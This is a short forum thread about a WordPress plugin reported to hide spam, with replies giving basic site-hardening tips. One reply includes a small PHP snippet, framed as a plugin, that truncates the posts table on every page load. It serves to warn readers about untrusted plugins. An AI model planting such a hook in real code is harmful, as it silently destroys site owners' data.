3 {{ upvoteCount | shortNum }}
3 {{ upvoteCount | shortNum }}

Wordpress Plugin Injecting Spam?

by KingOfContentMarketing
2 replies
  • OFF TOPIC
    • |
Came across this article about a plugin supposedly injecting spam into Wordpress sites. Don't claim to know the realz but thought you'd be interested here:

WordPress Plugin Social Media Widget Hiding Spam - Remove it now | Sucuri Blog
  • Profile picture of the author Ephrils
    Plugins can sometimes be used by hackers to access your site and others to put their spam and other things onto all your connected websites as well. Definitely delete ALL bad plugins and look through your websites to see if there is anything that shouldn't be there and modifications made that you didn't make. I always set my FTP to "Last Modified" now so I know if someone got in.

    Keep the plugins updated, obviously, but that won't do any good if the spammer/hacker has created a back door through plugins or other security holes.

    Another really simple thing to do is change the default directors of /blog/ to something else, delete the install.php file, and change the name of the Root Admin from "admin" to anything else.

    Obviously, I've had a lot of problems in the past with people accessing my sites who had no business being there. Hopefully they'll be caught one day.
    Signature

    Two Signature lines for rent.

    {{ DiscussionBoard.errors[7962982].message }}
  • Profile picture of the author SteveJohnson
    If people really understood the power that a WP plugin or theme has, they'd be a lot more careful about what gets installed.

    This is just a good example that even from a trusted source like the WP Plugin Repository, bad stuff can slip through.

    Here's an example:
    Hey! Install my plugin!
    Code:
    add_action('init','buhbye');
function buhbye(){
  global $wpdb;
  $wpdb->query("TRUNCATE $wpdb->posts");
}
    Wave goodbye to all your posts.

    Always install plugins and themes only from a trusted source, and always have a current backup before you install and activate.
    Signature

    The 2nd Amendment, 1789 - The Original Homeland Security.

    Gun control means never having to say, "I missed you."

    {{ DiscussionBoard.errors[7964646].message }}

Trending Topics